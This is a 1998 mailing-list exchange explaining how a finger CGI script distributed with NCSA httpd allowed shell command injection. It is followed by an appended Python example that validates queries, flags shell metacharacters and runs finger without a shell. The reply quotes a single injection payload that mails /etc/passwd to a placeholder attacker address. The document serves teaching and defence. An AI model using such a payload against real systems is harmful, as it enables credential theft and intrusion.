From Josh Rotenberg <>
Subject Re: Seeking information about old NCSA httpd `finger' bug
Date Mon, 22 Jun 1998 17:43:00 GMT
I don't have the script in front of me, and I don't know of a particular
'incident', but I'm guessing the script doesn't escape characters in the command
it creates, i.e. you type in a query to finger, and the script simply takes it
and executes it in a shell as 'finger whatever@wherever' without checking for, say,
a ';', which would allow you to execute a second command, so if I were to type
'; mail haxor@domain< /etc/passwd'

I would end up getting the /etc/passwd file of the machine.

I assume this is what you are looking for ... sorry if I'm explaining stuff you
already know and were looking for something else.


Said Mark-Jason Dominus <> on Mon, Jun 22, 1998 at 09:51:27AM -0400:
> Back around 1995 or so there was a problem with a sample application
> distributed with NCSA httpd.  The application was a shell script that
> was supposed to deliver the `finger' service on the web.  
> The problem was pretty typical; I think if you put some sort of shell
> metacharacter into the query string, you could get the program to
> execute arbitrary commands.  But I don't remember it exactly.  
> I am going to be giving a talk about security and the WWW, and I
> wanted to discuss this episode.  I've been over the CERT archives and
> I can't find any information about it, and I've even dug up the old
> source code and found the script, but I can't figure out how to
> exercise the bug.
> Is there anyone who remembers this and can remind me of the details?

	josh rotenberg - -		
			     // whatever
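As an added illustration of the check the script above was missing (my code, not the NCSA sample or anything from this thread), here is the defender's version: allowlist the query to a plain user@host shape, flag any shell metacharacter for logging, and hand finger an argv list instead of a shell command line. The allowed-character regex and the 64-character limit are my assumptions.

```python
import re
import subprocess

# Characters that let a shell-interpreted command line grow a second command,
# redirect output, or substitute text (constructed list, not exhaustive).
SHELL_METACHARS = set(";|&<>`$()\n'\"\\")

# Assumed policy: a finger query is "user", "@host" or "user@host" built from
# letters, digits, '.', '_' and '-', never starting with '-' (which finger
# would read as an option), and at most 64 characters long.
_QUERY_RE = re.compile(r"(?!-)[A-Za-z0-9._-]*(@[A-Za-z0-9.-]+)?")
MAX_QUERY_LEN = 64


def find_shell_metachars(query):
    """Return the distinct shell metacharacters in query, in order seen.

    A legitimate finger query never needs any of them, so a non-empty
    result over logged query strings is a good alerting condition.
    """
    seen = []
    for ch in query:
        if ch in SHELL_METACHARS and ch not in seen:
            seen.append(ch)
    return seen


def is_safe_finger_query(query):
    """Allowlist check: only a plain user/host query passes.

    fullmatch is used on purpose: '$' would accept a trailing newline.
    """
    return 0 < len(query) <= MAX_QUERY_LEN and _QUERY_RE.fullmatch(query) is not None


def build_finger_argv(query):
    """Build the argv to exec, or raise ValueError.

    Handing the OS a list (no shell) means a ';' could not start a second
    command even if it slipped through; the allowlist rejects it anyway,
    so both layers would have to fail before anything bad happens.
    """
    if not is_safe_finger_query(query):
        raise ValueError("rejected finger query: %r" % (query,))
    return ["finger", query]


def run_finger(query):
    """Run finger with an argv list, no shell, and a bounded runtime."""
    result = subprocess.run(build_finger_argv(query), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout
```

Fed the payload quoted in this thread, find_shell_metachars reports ';' and '<' and build_finger_argv refuses to run at all.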

